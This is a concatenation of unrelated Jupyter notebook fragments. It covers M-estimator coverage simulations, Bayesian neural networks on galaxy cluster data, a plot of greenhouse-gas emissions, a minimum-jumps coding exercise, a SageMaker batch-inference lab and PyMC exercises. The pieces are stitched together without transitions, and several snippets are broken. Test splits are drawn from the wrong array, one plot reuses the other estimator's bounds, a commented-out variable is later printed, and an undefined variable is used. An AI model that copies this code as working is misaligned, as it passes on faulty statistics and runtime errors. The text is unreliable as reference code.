y=y) starting_vals = [0, -0.1, 0.7] estr = MEstimator(psi, init=starting_vals) estr.estimate(solver='newton', maxiter=20000) est_estr1[d].append(estr.theta[0] - truth[d]) ci = estr.confidence_intervals()[0, :] if ci[0] < truth[d] and ci[1] > truth[d]: ci_estr1[d].append(1) else: ci_estr1[d].append(0) # Second option # previously optimized coefs coefficients = estr.theta[1:] def psi(theta): return psi_estr2(theta=theta, delta=d, W=W, A=A, y=y, coefs=coefficients) starting_vals = [0, -0.1, 0.7] estr = MEstimator(psi, init=starting_vals) estr.estimate(solver='newton', maxiter=20000) est_estr2[d].append(estr.theta[0] - truth[d]) if ci[0] < truth[d] and ci[1] > truth[d]: ci_estr2[d].append(1) else: ci_estr2[d].append(0) estr1_bias, estr2_bias = {}, {} estr1_lower, estr2_lower = {}, {} estr1_upper, estr2_upper = {}, {} for d in delta: estr1_bias[d] = np.mean(est_estr1[d]) estr2_bias[d] = np.mean(est_estr2[d]) estr1_lower[d] = np.quantile(est_estr1[d], q=0.05) estr2_lower[d] = np.quantile(est_estr2[d], q=0.05) estr1_upper[d] = np.quantile(est_estr1[d], q=0.95) estr2_upper[d] = np.quantile(est_estr2[d], q=0.95) plt.figure(figsize=[12, 5]) plt.subplot(121) plt.plot(estr1_bias.keys(), estr1_bias.values(), 'o-', color='blue') plt.plot(estr1_lower.keys(), estr1_lower.values(), 'o-', color='red') plt.plot(estr1_upper.keys(), estr1_upper.values(), 'o-', color='red') plt.xlabel(r"$\delta$") plt.ylabel("Mean under \n stochastic plan") plt.ylim([-0.5, 0.5]) plt.subplot(122) plt.plot(estr2_bias.keys(), estr2_bias.values(), 'o-', color='blue') plt.plot(estr1_lower.keys(), 
estr1_lower.values(), 'o-', color='red') plt.plot(estr1_upper.keys(), estr1_upper.values(), 'o-', color='red') plt.xlabel(r"$\delta$") plt.ylabel("Mean under \n stochastic plan") plt.ylim([-0.5, 0.5]) plt.tight_layout() estr1_cover, estr2_cover = {}, {} for d in delta: estr1_cover[d] = np.mean(ci_estr1[d]) estr2_cover[d] = np.mean(ci_estr2[d]) plt.figure(figsize=[12, 5]) plt.subplot(121) plt.plot(estr1_cover.keys(), estr1_cover.values(), 'o-', color='blue') plt.hlines(0.95, -5.1, 5.1, colors='k', linestyles='--') plt.xlabel(r"$\delta$") plt.ylabel("Confidence interval \n coverage") plt.ylim([0.8, 1]) plt.xlim([-5.1, 5.1]) plt.subplot(122) plt.plot(estr2_cover.keys(), estr2_cover.values(), 'o-', color='blue') plt.hlines(0.95, -5.1, 5.1, colors='k', linestyles='--') plt.xlabel(r"$\delta$") plt.ylabel("Confidence interval \n coverage") plt.ylim([0.8, 1]) plt.xlim([-5.1, 5.1]) plt.tight_layout()Case 2: Aleatoric Uncertainty using data cleaning from TancevOct 8 2021# Define helper functions. scaler = StandardScaler() detector = IsolationForest(n_estimators=1000, contamination="auto", random_state=0) gal_df = pd.read_csv("Data/galaxies_near_clusters_0.3-0.6.csv") cluster_data = pd.read_csv("Data/cluster_data_0.3-0.6.csv") # clear outliers xname="sm_0.67"; yname="halo_mass" xname="stellarmass"; yname="halo_mass" x=cluster_data[xname]; y=cluster_data[yname]; unit_df =pd.DataFrame(data={"x":x,"y":y}) print(unit_df.shape) # Scale data to zero mean and unit variance. X_t = scaler.fit_transform(unit_df) # Remove outliers. detector = IsolationForest(n_estimators=1000, contamination=0.05, random_state=0) is_inlier = detector.fit_predict(X_t) X_t = X_t[(is_inlier > 0),:] inv_df=pd.DataFrame(data={xname:X_t[:,0],yname:X_t[:,1]}) X_t = scaler.inverse_transform(inv_df) xc=X_t[:,0] yc=X_t[:,1] print(unit_df.shape) print(inv_df.shape) # Build model. model = tf.keras.Sequential([ tf.keras.layers.Dense(1 + 1), tfp.layers.DistributionLambda( lambda t: tfd.Normal(loc=t[..., :1], scale=1e-3 + tf.math.softplus(0.05 * t[...,1:]))), ]) negloglik = lambda y, rv_y: -rv_y.log_prob(y) # Do inference. model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.01), loss=negloglik) model.fit(xc, yc, epochs=1000, verbose=False); # Profit. x_tst=np.arange(x.min(),x.max(),0.1) x_tst=x_tst[:,None] [print(np.squeeze(w.numpy())) for w in model.weights]; yhat = model(x_tst) assert isinstance(yhat, tfd.Distribution) inv_df=pd.DataFrame(data={xname:X_t[:,0],yname:X_t[:,1]}) sns.regplot(x=xname,y=yname, data=cluster_data, line_kws={"color": "blue"}) sns.regplot(x=xname,y=yname, data=inv_df, line_kws={"color": "orange"}) plt.plot(x_tst, yhat.mean(),'purple', label='mean', linewidth=3); plt.plot(x_tst, yhat.quantile(0.32),'g',linewidth=0.5); plt.plot(x_tst, yhat.quantile(0.68),'g',linewidth=0.5); plt.plot(x_tst, yhat.quantile(0.10),'g',linewidth=0.5); plt.plot(x_tst, yhat.quantile(0.90),'g',linewidth=0.5);This seemingly made very little difference, for a outlier set to contamination=0.05. Setting contamination=0.15 has a bigger effect. 
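To make the `contamination` comparison above concrete, here is a small, self-contained sketch. It is not from the notebook and uses synthetic data in place of the cluster catalogue; it only shows how the fraction of points flagged by `IsolationForest` tracks the `contamination` argument.

```python
# Hedged illustration (not the notebook's data): how `contamination` changes the
# fraction of points IsolationForest flags as outliers.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)
X = rng.normal(size=(500, 2))  # stand-in for the scaled (stellarmass, halo_mass) pairs

for contamination in (0.05, 0.15):
    labels = IsolationForest(n_estimators=1000,
                             contamination=contamination,
                             random_state=0).fit_predict(X)
    n_removed = int((labels < 0).sum())  # fit_predict returns -1 for flagged outliers
    print(f"contamination={contamination}: {n_removed} points flagged as outliers")
```

Since `contamination` is the assumed outlier fraction, raising it from 0.05 to 0.15 roughly triples the number of points removed before fitting, which is consistent with the larger effect noted above.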
Folowing Probabilistic Bayesian Neural Networkshttps://keras.io/examples/keras_recipes/bayesian_neural_networks/Oct 8 2021import numpy as np import tensorflow as tf from tensorflow import keras from tensorflow.keras import layers import tensorflow_probability as tfp def get_train_and_test_splits(train_size, batch_size=1): import tensorflow_datasets as tfds import Data dataset = ( tfds.load(name="dataset", data_dir="./", as_supervised=False, split="train", download=False) .map(lambda x, y: (x, tf.cast(y, tf.float32))) .prefetch(buffer_size=dataset_size) .cache() ) # We shuffle with a buffer the same size as the dataset. train_dataset = ( dataset.take(train_size).shuffle(buffer_size=train_size).batch(batch_size) ) test_dataset = dataset.skip(train_size).batch(batch_size) return train_dataset, test_dataset hidden_units = [8, 8] learning_rate = 0.001 def run_experiment(model, loss, train_dataset, test_dataset, num_epochs = 100): model.compile( optimizer=keras.optimizers.RMSprop(learning_rate=learning_rate), loss=loss, metrics=[keras.metrics.RootMeanSquaredError()], ) x1 = train_dataset[0] x2 = train_dataset[1] y = train_dataset[2] tx1 = test_dataset[0] tx2 = test_dataset[1] ty = test_dataset[2] print("Start training the model...") #model.fit(x=[x1,x2], y=y, epochs=num_epochs, validation_data=[tx1,tx2,ty]) model.fit(x=[x1,x2], y=y, epochs=num_epochs) print("Model training finished.") _, rmse = model.evaluate(x=[x1,x2], y=y, verbose=0) print(f"Train RMSE: {round(rmse, 3)}") print("Evaluating model performance...") _, rmse = model.evaluate(x=[tx1,tx2], y=ty, verbose=0) print(f"Test RMSE: {round(rmse, 3)}") xname="sm_0.67"; yname="halo_mass" xname="stellarmass"; yname="halo_mass"; x2name="central_sm" gal_df = pd.read_csv("Data/galaxies_near_clusters_0.3-0.6.csv") cluster_data = pd.read_csv("Data/cluster_data_0.3-0.6.csv") x=cluster_data[xname]; y=cluster_data[yname]; x2=cluster_data[x2name] FEATURE_NAMES = [ xname, x2name, ] def create_model_inputs(): inputs = {} for feature_name in FEATURE_NAMES: inputs[feature_name] = layers.Input( name=feature_name, shape=(1,), dtype=tf.float32 ) return inputsExperiment 1: standard neural networkWe create a standard deterministic neural network model as a baseline.def create_baseline_model(): inputs = create_model_inputs() input_values = [value for _, value in sorted(inputs.items())] features = keras.layers.concatenate(input_values) features = layers.BatchNormalization()(features) # Create hidden layers with deterministic weights using the Dense layer. for units in hidden_units: features = layers.Dense(units, activation="sigmoid")(features) # The output is deterministic: a single point estimate. 
outputs = layers.Dense(units=1)(features) model = keras.Model(inputs=inputs, outputs=outputs) return model x = np.asarray(x).astype('float32') x2 = np.asarray(x2).astype('float32') y = np.asarray(y).astype('float32') n=150 x_tr=x[0:n]; x_te=x[n:] x2_tr=x2[0:n]; x2_te=x[n:] y_tr=y[0:n]; y_te=x[n:] xx_tr=np.array([x_tr,x2_tr,y_tr]); xx_te=np.array([x_te,x2_te,y_te]) print("xx_tr: {}".format(xx_tr.shape)) print("y_tr: {}".format(y_tr.shape)) train_dataset = [x_tr, x2_tr, y_tr] test_dataset = [x_te, x2_te, y_te] #train_dataset = pd.DataFrame({xname:xx_tr,yname:y_tr}) #test_dataset = pd.DataFrame({xname:xx_te,yname:y_te}) #print(train_dataset) #tr_df=tf.data.Dataset.from_tensor_slices(train_dataset) #te_df=tf.data.Dataset.from_tensor_slices(test_dataset) #tr_df=tf.convert_to_tensor(train_dataset, dtype=tf.float32) #te_df=tf.convert_to_tensor(test_dataset, dtype=tf.float32) #print(tr_df) #print(te_df) #dataset = train_dataset.enumerate() #for element in dataset.as_numpy_iterator(): # print(element) mse_loss = keras.losses.MeanSquaredError() baseline_model = create_baseline_model() baseline_model.summary() run_experiment(baseline_model, mse_loss, train_dataset, test_dataset) n_samples=30 y_fit = baseline_model.predict(x=[test_dataset[0], test_dataset[1]]) y_true = test_dataset[2] sns.regplot(x=y_true, y=y_fit)Experiment 2: Bayesian neural network (BNN)The object of the Bayesian approach for modeling neural networks is to capture the epistemic uncertainty, which is uncertainty about the model fitness, due to limited training data.The idea is that, instead of learning specific weight (and bias) values in the neural network, the Bayesian approach learns weight distributions - from which we can sample to produce an output for a given input - to encode weight uncertainty.Thus, we need to define prior and the posterior distributions of these weights, and the training process is to learn the parameters of these distributions.# Define the prior weight distribution as Normal of mean=0 and stddev=1. # Note that, in this example, the we prior distribution is not trainable, # as we fix its parameters. def prior(kernel_size, bias_size, dtype=None): n = kernel_size + bias_size prior_model = keras.Sequential( [ tfp.layers.DistributionLambda( lambda t: tfp.distributions.MultivariateNormalDiag( loc=tf.zeros(n), scale_diag=tf.ones(n) ) ) ] ) return prior_model # Define variational posterior weight distribution as multivariate Gaussian. # Note that the learnable parameters for this distribution are the means, # variances, and covariances. def posterior(kernel_size, bias_size, dtype=None): n = kernel_size + bias_size posterior_model = keras.Sequential( [ tfp.layers.VariableLayer(tfp.layers.MultivariateNormalTriL.params_size(n), dtype=dtype), tfp.layers.MultivariateNormalTriL(n), ] ) return posterior_model def xposterior(kernel_size, bias_size, dtype=None): n = kernel_size + bias_size c = np.log(np.expm1(1.)) posterior_model = keras.Sequential( [ tfp.layers.VariableLayer(2 * n, dtype=dtype), tfp.layers.DistributionLambda(lambda t: tfd.Independent( tfd.Normal( loc=t[..., :n], scale=1e-5 + tf.nn.softplus(c + t[..., n:]) ), reinterpreted_batch_ndims=1) ), ] ) return posterior_model def create_bnn_model(train_size): inputs = create_model_inputs() features = keras.layers.concatenate(list(inputs.values())) features = layers.BatchNormalization()(features) # Create hidden layers with weight uncertainty using the DenseVariational layer. 
for units in hidden_units: features = tfp.layers.DenseVariational( units=units, make_prior_fn=prior, make_posterior_fn=posterior, kl_weight=1 / train_size, activation="sigmoid", )(features) # The output is deterministic: a single point estimate. outputs = layers.Dense(units=1)(features) model = keras.Model(inputs=inputs, outputs=outputs) return modelWe use the tfp.layers.DenseVariational layer instead of the standard keras.layers.Dense layer in the neural network model. Train BNN with a small training subset.The epistemic uncertainty can be reduced as we increase the size of the training data. That is, the more data the BNN model sees, the more it is certain about its estimates for the weights (distribution parameters). Let's test this behaviour by training the BNN model on a small subset of the training set, and then on the full training set, to compare the output variances.num_epochs = 500 tr_size = train_dataset[0].size print(tr_size) bnn_model_small = create_bnn_model(train_dataset[0].size) run_experiment(bnn_model_small, mse_loss, train_dataset, test_dataset)150 WARNING:tensorflow:From /global/homes/a/annis/.conda/envs/tflow/lib/python3.9/site-packages/tensorflow/python/ops/linalg/linear_operator_lower_triangular.py:159: calling LinearOperator.__init__ (from tensorflow.python.ops.linalg.linear_operator) with graph_parents is deprecated and will be removed in a future version. Instructions for updating: Do not pass `graph_parents`. They will no longer be used. WARNING:tensorflow:From /global/homes/a/annis/.conda/envs/tflow/lib/python3.9/site-packages/tensorflow_probability/python/distributions/distribution.py:298: calling MultivariateNormalDiag.__init__ (from tensorflow_probability.python.distributions.mvn_diag) with scale_identity_multiplier is deprecated and will be removed after 2020-01-01. Instructions for updating: `scale_identity_multiplier` is deprecated; please combine it with `scale_diag` directly instead.Broken Experiment 3: probabilistic Bayesian neural networkSo far, the output of the standard and the Bayesian NN models that we built is deterministic, that is, produces a point estimate as a prediction for a given example. We can create a probabilistic NN by letting the model output a distribution. In this case, the model captures the aleatoric uncertainty as well, which is due to irreducible noise in the data, or to the stochastic nature of the process generating the data.In this example, we model the output as a IndependentNormal distribution, with learnable mean and variance parameters. If the task was classification, we would have used IndependentBernoulli with binary classes, and OneHotCategorical with multiple classes, to model distribution of the model output.Since the output of the model is a distribution, rather than a point estimate, we use the negative loglikelihood as our loss function to compute how likely to see the true data (targets) from the estimated distribution produced by the model.def create_probablistic_bnn_model(train_size): inputs = create_model_inputs() features = keras.layers.concatenate(list(inputs.values())) features = layers.BatchNormalization()(features) # Create hidden layers with weight uncertainty using the DenseVariational layer. 
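# (added note) Same variational hidden layers as the BNN above; the change is at the output,
# where a Dense(units=2) layer will produce the mean and scale parameters fed to
# tfp.layers.IndependentNormal, so the model returns a predictive distribution rather than
# a point estimate.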
for units in hidden_units: features = tfp.layers.DenseVariational( units=units, make_prior_fn=prior, make_posterior_fn=posterior, kl_weight=1 / train_size, activation="sigmoid", )(features) # Create a probabilisticå output (Normal distribution), and use the `Dense` layer # to produce the parameters of the distribution. # We set units=2 to learn both the mean and the variance of the Normal distribution. distribution_params = layers.Dense(units=2)(features) outputs = tfp.layers.IndependentNormal(1)(distribution_params) model = keras.Model(inputs=inputs, outputs=outputs) return model def negative_loglikelihood(targets, estimated_distribution): return -estimated_distribution.log_prob(targets) num_epochs = 1000 prob_bnn_model = create_probablistic_bnn_model(train_size) run_experiment(prob_bnn_model, negative_loglikelihood, train_dataset, test_dataset)from io import BytesIO import urllib, zipfile, requests r = urllib.request.urlopen('https://wri-sites.s3.amazonaws.com/climatewatch.org/www.climatewatch.org/climate-watch/climate-watch-download-zip/ghg-emissions.zip') with zipfile.ZipFile(BytesIO(r.read())) as z: print( z.namelist() ) z.extractall() import pandas as pd from matplotlib import pyplot as plt df = pd.read_excel('CW_CAIT_GHG_Emissions.xlsx', index_col='Country') df clean_df_including_LUCF = df[df.Sector == 'Total including LUCF'] clean_df_all_ghg = clean_df_including_LUCF[clean_df_including_LUCF.Gas == 'All GHG'] clean_df_all_ghg_transposed = clean_df_all_ghg.transpose() clean_df_all_ghg_transposed = clean_df_all_ghg_transposed.drop(['Source', 'Sector','Gas']) clean_df_all_ghg_transposed x_axis = clean_df_all_ghg_transposed.index china = clean_df_all_ghg_transposed.CHN usa = clean_df_all_ghg_transposed.USA india = clean_df_all_ghg_transposed.IND russia = clean_df_all_ghg_transposed.RUS japan = clean_df_all_ghg_transposed.JPN germany = clean_df_all_ghg_transposed.DEU iran = clean_df_all_ghg_transposed.IRN south_korea = clean_df_all_ghg_transposed.KOR saudi_arabia = clean_df_all_ghg_transposed.SAU indonesia = clean_df_all_ghg_transposed.IDN plt.plot(x_axis,china) plt.plot(x_axis,usa) plt.plot(x_axis,india) plt.plot(x_axis,russia) plt.plot(x_axis,japan) plt.plot(x_axis,germany) plt.plot(x_axis,iran) plt.plot(x_axis,south_korea) plt.plot(x_axis,saudi_arabia) plt.plot(x_axis,indonesia) plt.legend(['China', 'USA', 'India', 'Russia', 'Japan', 'Germany', 'Iran', 'South Korea', 'Saudi Arabia', 'Indonesia']) plt.title('Green House Gas Emissions Including LUCF') plt.xlabel('Year') plt.ylabel('GHG Emissions (Mt)') plt.savefig('/content/drive/MyDrive/topEmitters.png') plt.show()ProblemGiven an array of positive integers, find the minimum number of jumps required to get from the first index to the final one.Sample input:```array = [4, 2, 1, 1, 3, 1, 2, 1]```Sample output:```2 (4 --> 3 --> 1)```Note that jumping from index `i` to index `i + X` is still one jump, regardless of the size of X We build a new array to store minimum number of jumps from index 0 to rest of indices. The first is 0. 
(since step required to jump from an index to itself is zero)Progressively build the array using the previously computed min jumps.def minJumps(array): """O(n) space | O(n^2) time, since for every index, we are checking all elements to its left""" jumps = [float('inf') for i in array] jumps[0] = 0 for i in range(1, len(array)): for j in range(0, i): # check if value before i (array[j]), if the step j is added to it, will it exceed i if array[j] + j >= i: jumps[i] = min(jumps[i], jumps[j] + 1) # the last element contains the min jumps required to reach the end of array return jumps[-1] minJumps([4, 2, 1, 1, 3, 1, 2, 1])Huggingface Sagemaker-sdk - Run a batch transform inference job with 🤗 Transformers In the this lab, we will deploy one of the 10 000+ Hugging Face Transformers from the [Hub](https://huggingface.co/models) to Amazon SageMaker for batch inference. 1. [Setup](Setup) 3. [Run Batch Transform Inference Job with a fine-tuned model using `jsonl`](Run-Batch-Transform-Inference-Job-with-a-fine-tuned-model-using-jsonl) 3. [Download Dataset](Download-Dataset)3. [Data Pre-Processing](Data-Pre-Processing)3. [Download pre-trained model](Download-pre-trained-model)3. [Package pre-trained model into .tar.gz format](Package-pre-trained-model-into-.tar.gz-format)3. [Upload model to s3](Upload-model-to-s3)3. [Run batch transform job for offline scoring](Run-batch-transform-job-for-offline-scoring) Setup!pip install torch !pip install "sagemaker>=2.48.0" --upgrade !pip install transformers -q !pip install ipywidgets -q !pip install datasets # restart kernel after installing the packages from IPython.display import display_html def restartkernel() : display_html("",raw=True) restartkernel() import sagemaker sagemaker.__version__ import torch torch.__version__Run Batch Transform Inference Job with a fine-tuned model using `jsonl` Download DatasetDownload the `tweet_eval` dataset from the datasets library.from datasets import load_dataset dataset = load_dataset("tweet_eval", "sentiment") tweet_text = dataset['validation'][:]['text']Data Pre-Processing The dataset contains ~2000 tweets. We will format the dataset to a `jsonl` file and upload it to s3. Due to the complex structure of text are only `jsonl` file supported for batch/async inference._**NOTE**: While preprocessing you need to make sure that your `inputs` fit the `max_length`._import csv import json import sagemaker from sagemaker.s3 import S3Uploader,s3_path_join # get the s3 bucket sess = sagemaker.Session() role = sagemaker.get_execution_role() sagemaker_session_bucket = sess.default_bucket() # datset files dataset_jsonl_file="tweet_data.jsonl" # data_json = {} data_json = [] with open(dataset_jsonl_file, "w+") as outfile: for row in tweet_text: # remove @ row = row.replace("@","") json.dump({ 'inputs': str(row) }, outfile) data_json.append({ 'inputs': str(row) }) outfile.write('\n') # uploads a given file to S3. input_s3_path = s3_path_join("s3://",sagemaker_session_bucket,"batch_transform/input") output_s3_path = s3_path_join("s3://",sagemaker_session_bucket,"batch_transform/output") s3_file_uri = S3Uploader.upload(dataset_jsonl_file,input_s3_path) print(f"{dataset_jsonl_file} uploaded to {s3_file_uri}")The created file looks like this```json{"inputs": "Dark Souls 3 April Launch Date Confirmed With New Trailer: Embrace the darkness."}{"inputs": "\"National hot dog day, national tequila day, then national dance day... Sounds like a Friday night.\"}{"inputs": "When girls become bandwagon fans of the Packers because of Harry. 
Do y'all even know who is? Or what a 1st down is?"}{"inputs": "user I may or may not have searched it up on google"}{"inputs": "Here's your starting TUESDAY MORNING Line up at Gentle Yoga with Laura 9:30 am to 10:30 am..."}{"inputs": "VirginAmerica seriously would pay $30 a flight for seats that didn't h...."}{"inputs": "user F-Main, are you in the office tomorrow if I send over some Curtis proofs c/o you, for you and a few colleagues?\""},{"inputs": "US 1st Lady speaking at the 2015 Beating the Odds Summit to over 130 college-bound students at the pentagon office."},{"inputs": "Omg this show is so predictable even for the 3rd ep. Rui En\\u2019s ex boyfriend was framed for murder probably\\u002c by a guy."},{"inputs": "\"What a round by , good luck tomorrow and I hope you win the Open.\""},{"inputs": "Irving Plaza NYC Blackout Saturday night. Got limited spots left on the guest list. Tweet me why you think you deserve them"}....``` Download pre-trained modelWe use the [distilbert-base-uncased-finetuned-sst-2-english](https://huggingface.co/distilbert-base-uncased-finetuned-sst-2-english) model running our batch transform job.### Download Hugging Face Pretrained Model from transformers import AutoModelForSequenceClassification, AutoTokenizer MODEL = 'distilbert-base-uncased-finetuned-sst-2-english' model = AutoModelForSequenceClassification.from_pretrained(MODEL) tokenizer = AutoTokenizer.from_pretrained(MODEL) model.save_pretrained('model_token') tokenizer.save_pretrained('model_token')Package pre-trained model into .tar.gz format# package pre-trained model into .tar.gz format !cd model_token && tar zcvf model.tar.gz * !mv model_token/model.tar.gz ./model.tar.gzUpload model to s3# upload pre-trained model to s3 bucket model_url = s3_path_join("s3://",sagemaker_session_bucket,"batch_transform/model") print(f"Uploading Model to {model_url}") model_uri = S3Uploader.upload('model.tar.gz',model_url) print(f"Uploaded model to {model_uri}")Run batch transform job for offline scoringfrom sagemaker.huggingface.model import HuggingFaceModel # create Hugging Face Model Class huggingface_model = HuggingFaceModel( model_data=model_uri, # configuration for loading model from Hub role=role, # iam role with permissions to create an Endpoint transformers_version="4.6", # transformers version used pytorch_version="1.7", # pytorch version used py_version='py36', # python version used ) # create Transformer to run our batch job batch_job = huggingface_model.transformer( instance_count=1, instance_type='ml.g4dn.xlarge', output_path=output_s3_path, # we are using the same s3 path to save the output with the input strategy='SingleRecord') # starts batch transform job and uses s3 data as input batch_job.transform( data=s3_file_uri, content_type='application/json', split_type='Line') import json from sagemaker.s3 import S3Downloader from ast import literal_eval # creating s3 uri for result file -> input file + .out output_file = f"{dataset_jsonl_file}.out" output_path = s3_path_join(output_s3_path,output_file) # download file S3Downloader.download(output_path,'.') batch_transform_result = [] with open(output_file) as f: for line in f: # converts jsonline array to normal array line = "[" + line.replace("[","").replace("]",",") + "]" batch_transform_result = literal_eval(line) # print results batch_transform_result[:3]Harder problems The previous notebooks were addressing simple problems, that in most cases would not require a full Bayesian model to be fitted. We are now going to explore some more complex scenarios. 
First here is a list of the most interesting notebooks and exercises I've found. The PyMC documentation website is a goldmine itself, since they increasingly include a variety of examples all correlated by a notebook. Not all of them are relevant for the next problems, but you can check them out to have an idea of what one can do with Probabilistic modeling. **Rugby Example**https://docs.pymc.io/notebooks/rugby_analytics.html**Survival Analysis**https://docs.pymc.io/notebooks/bayes_param_survival_pymc3.html**CO2 Levels Prediction**https://docs.pymc.io/notebooks/GP-MaunaLoa.html**Dependent Density Regression**https://docs.pymc.io/notebooks/dependent_density_regression.html**Dirichlet Processes**https://docs.pymc.io/notebooks/dp_mix.html AB TestingAn example of AB Testing can be found in Chapter 2 of the Bayesian Methods for hackers (https://nbviewer.jupyter.org/github/CamDavidsonPilon/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers/blob/master/Chapter2_MorePyMC/Ch2_MorePyMC_PyMC3.ipynb)A/B testing is a statistical design pattern for determining the difference of effectiveness between two different treatments, approaches, strategies. In the example above they model the case of web-developers interested in knowing which design of their website yields more sales or some other metric of interest. They will route some fraction of visitors to site A, and the other fraction to site B, and record if the visit yielded a sale or not. Here we go back to the IADS summer school example in the slides. Shaaba was still sending out invitations, as fliers and emails. After 1 month, she wanted to know which strategy was more effective and which one was more cost-effective. ( imagine a world where each flier/ad corresponds to a single signup). Idea: For AB testing, you should model both datasets with the same likelihood and check which one has the best values for the parameters. For cost-effectiveness, remember that you can use deterministic variables to evaluate the cost of each strategy.import numpy as np import pandas as pd import seaborn as sns import pymc3 as pm import matplotlib.pyplot as plt # Data: for each flier/ad we have a binary value # that corresponds to whether it was effective or not (the person signed) fliers = [1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0] emails = [1, 0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,1,1,1,1,0,0] # Cost of each flier/email (Shaaba's time isn't for free) cost_flier = 10 cost_email = 2 # Revenue for each sign up fee = 100 # How many times did someone sign up? What's the observed frequency for the sign up? #What was the cost of the two campaigns? print('Fliers: %d sent, %d signed up, %f ratio' %(len(fliers),np.sum(fliers),np.sum(fliers)/len(fliers) )) print('Cost: %f sent, Revenue %f' %(len(fliers)*cost_flier,np.sum(fliers)*fee)) print('Emails: %d sent, %d signed up, %f ratio' %(len(emails),np.sum(emails),np.sum(emails)/len(emails) )) print('Cost: %f sent, Revenue %f' %(len(emails)*cost_email,np.sum(emails)*fee)) # What distribution is appropriate to describe the likelihood of the data? 
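# (added note) Each flier/email outcome is a 0/1 trial, so a Bernoulli likelihood with an
# unknown sign-up probability p is a natural choice, with a flat Beta(1, 1) prior on p as
# used below. Because the Beta prior is conjugate to the Bernoulli likelihood, the exact
# posterior is Beta(1 + successes, 1 + failures); e.g. the analytic posterior mean for the
# fliers is (1 + sum(fliers)) / (2 + len(fliers)), a handy sanity check on the MCMC traces.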
# Build the model with pm.Model() as model: p_fliers=pm.Beta('p_fliers',alpha = 1, beta = 1 ) p_emails=pm.Beta('p_emails',alpha = 1, beta = 1 ) e_obs= pm.Bernoulli('e_obs', p=p_emails, observed = emails) f_obs= pm.Bernoulli('f_obs', p=p_fliers, observed = fliers) # Add deterministic variables to compare the two models ab = pm.Deterministic('ab', p_fliers-p_emails) test = pm.Deterministic('test', p_fliers>p_emails) r_fliers = pm.Deterministic('r_fliers', p_fliers*fee/cost_flier) r_emails = pm.Deterministic('r_emails', p_emails*fee/cost_email) delta_r = pm.Deterministic('delta_r', r_fliers-r_emails) # Inference trace = pm.sample(20000, tune= 1000) # Show results. Which approach is more effective? cost effective? What happens if the cost of fliers drops? # How many times was the sign up ratio of fliers higher than the one of emails np.sum(trace['test']/len(trace['test'])) pm.traceplot(trace)Image segmentationBayesian learning allows to fit mixture models and apply data clustering. A good starting point for clustering with PyMC3 is the notebook https://nbviewer.jupyter.org/github/CamDavidsonPilon/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers/blob/master/Chapter3_MCMC/Ch3_IntroMCMC_PyMC3.ipynb.There they apply a clustering algorithm to a mixture model. Remove BackgroundTry here to remove the background from this image. Instead of the 2D image, imagine the histogram of the values of all pixels...At the beginning don't worry about the 2d structure of the image, there are filtering algorithms that can take care of that at the end.with open('dummy_image.txt', 'r') as f: data=np.loadtxt(f,delimiter =',') data=data.reshape(len(data)*len(data),) data.shape # Plot the histogram of the data sns.distplot(data) # Build a clustering model for the mixture distribution using categorical variables import pymc3 as pm import theano.tensor as T with pm.Model() as model: p1 = pm.Uniform('p', 0, 1) p2 = 1 - p1/2 p3 = 1 - p1/2 p = T.stack([p1, p2, p3]) assignment = pm.Categorical("assignment", p, shape=data.shape[0], testval=np.random.randint(0, 3, data.shape[0])) print("prior assignment, with p = %.2f:" % p1.tag.test_value) print(assignment.tag.test_value[:100]) with model: sds = pm.Gamma("sds", 10, 1, shape=1) centers = pm.Normal("centers", mu=np.array([-100, 0, 100]), sd=np.array([10, 10, 10]), shape=3) center_i = pm.Deterministic('center_i', centers[assignment]) #sd_i = pm.Deterministic('sd_i', sds[assignment]) # and to combine it with the observations: observations = pm.Normal("obs", mu=center_i, sd=sds, observed=data) print("Random assignments: ", assignment.tag.test_value[:4], "...") print("Assigned center: ", center_i.tag.test_value[:4], "...") print("Assigned standard deviation: ", sd_i.tag.test_value[:4]) with model: trace = pm.sample(2500, tune=1000) import matplotlib as mpl plt.imshow(trace["assignment"][::50, np.argsort(data)], aspect=.4, alpha=.9) plt.xticks(np.arange(0, data.shape[0], 40), ["%.2f" % s for s in np.sort(data)[::40]]) plt.ylabel("posterior sample") plt.xlabel("value of $i$th data point") plt.title("Posterior labels of data points"); pm.traceplot(trace, varnames=['centers']) assign_trace = trace["assignment"] plt.scatter(data, assign_trace.mean(axis=0), c=assign_trace.mean(axis=0), s=50) plt.title("Probability of data point belonging to cluster 0") plt.ylabel("probability") plt.xlabel("value of data point"); # Use the predictions to segment the image. 
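# (added note) assign_trace.mean(axis=0) is the per-pixel average cluster label over the
# posterior samples (a soft assignment); the "1 -" below is just a display transform, and
# reshaping back to the 24x24 grid recovers the image, so background and foreground pixels
# end up with clearly different mask values.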
mask = 1 - assign_trace.mean(axis=0) mask=mask.reshape(24,24) plt.imshow(mask)PET imaging countsPET ( positron emission tomography) is a functional medical imaging technique relying on radioactive decay. In a usual PET test, a radioactive substance is introduced in the human body as a molecule whose destiny is known. For example, usually radioactive F18 molecules are used, so that metabolic activity, requiring glucose, can be traced.The raw data recorded by a PET are counts for each pixel for each time interval, but what is most interesting would be the average value of counts, so that area with stronger activity can be detected.In the figure below, that reports the total number of counts for each pixel of a dummy PET scan, you can spot a yellow area of high activity.# Ignore this with open('PET.txt', 'r') as f: pet=np.loadtxt(f,delimiter =',') pet_signal =np.array([np.random.poisson(pet) for i in range(1000)]) # Total number of counts plt.imshow(np.sum(pet_signal,axis=0))ExerciseTry to obtain the average counts for each pixel and try to segment the area of high activity using the techniques seen so farprint(signal) plt.imshow(np.average((signal),axis=0))[[[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]] [[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]] [[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 